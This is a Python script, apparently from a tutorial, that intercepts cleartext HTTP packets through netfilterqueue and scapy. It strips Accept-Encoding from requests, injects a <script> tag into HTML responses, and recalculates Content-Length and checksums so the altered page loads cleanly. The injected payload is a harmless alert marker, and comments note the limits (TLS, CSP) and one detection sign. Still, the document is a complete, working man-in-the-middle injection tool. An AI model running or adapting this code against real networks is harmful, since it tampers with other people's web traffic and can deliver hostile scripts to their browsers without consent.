Recalculating Content-Length:
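#!/usr/bin/env python
"""Rewrite cleartext HTTP traffic taken from a netfilter queue.

Requests to port 80 lose their Accept-Encoding header, responses from
port 80 get a test <script> inserted before </body>, and the
Content-Length header is increased by the size of the inserted bytes so
the client does not truncate the body.

The script only sees and edits unencrypted HTTP: it matches on port 80
and on plain-text markers in the TCP payload. Traffic carried over TLS is
not readable or modifiable here, and a Content-Security-Policy that
forbids inline scripts stops the inserted tag from executing.
"""
import re

from netfilterqueue import NetfilterQueue
from scapy.layers.inet import IP, TCP
from scapy.packet import Raw

# Harmless marker payload used to show that the response was altered.
INJECTION_CODE = b"<script>alert('test');</script>"

# The payload is bytes, so every pattern must be a bytes pattern too.
ACCEPT_ENCODING_RE = re.compile(rb"Accept-Encoding:.*?\r\n")
# \d+ (not \d*) so an empty match can never reach int().
CONTENT_LENGTH_RE = re.compile(rb"(?:Content-Length:\s)(\d+)")


def set_load(packet, load):
    """Replace the Raw payload of *packet* and return the packet.

    The IP length and the IP/TCP checksums are deleted so that scapy
    recomputes them when the packet is serialised; stale values would
    make the receiver drop the modified packet.
    """
    packet[Raw].load = load
    del packet[IP].len
    del packet[IP].chksum
    del packet[TCP].chksum
    return packet


def process_packet(packet):
    """Callback for each queued packet: edit HTTP payloads, then accept.

    *packet* is the netfilterqueue packet object. Every packet is
    accepted, whether or not it was modified.
    """
    scapy_packet = IP(packet.get_payload())
    # Raw can also sit on top of non-TCP layers; indexing [TCP] there
    # would raise, so both layers are required.
    if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP):
        original_load = scapy_packet[Raw].load
        load = original_load
        if scapy_packet[TCP].dport == 80:
            print("[+] Request")
            # Without Accept-Encoding the server is expected to answer
            # uncompressed, so the markers below appear as plain bytes.
            # A browser request that lacks this header is also a usable
            # detection signal for on-path tampering.
            load = ACCEPT_ENCODING_RE.sub(b"", load)
        elif scapy_packet[TCP].sport == 80:
            print("[+] Response")
            load = load.replace(b"</body>", INJECTION_CODE + b"</body>")
            match = CONTENT_LENGTH_RE.search(load)
            if match and b"text/html" in load:
                new_length = int(match.group(1)) + len(INJECTION_CODE)
                # Splice only the header value; a plain replace() of the
                # digit string would also rewrite the same digits
                # wherever else they occur in the payload.
                start, end = match.span(1)
                load = load[:start] + str(new_length).encode() + load[end:]
                # NOTE(review): the header is bumped whenever it is seen
                # in an HTML response, even if </body> is not in this
                # segment - assumes the tag arrives in a later one.
        if load != original_load:
            new_packet = set_load(scapy_packet, load)
            # bytes() serialises the packet; str() on Python 3 does not
            # produce the wire format.
            packet.set_payload(bytes(new_packet))
    packet.accept()


# Queue number 0 has to match the rule that feeds packets into the queue
# (that rule is not part of this page).
queue = NetfilterQueue()
queue.bind(0, process_packet)
try:
    queue.run()
except KeyboardInterrupt:
    print('')
finally:
    # Release the queue binding on any exit path.
    queue.unbind()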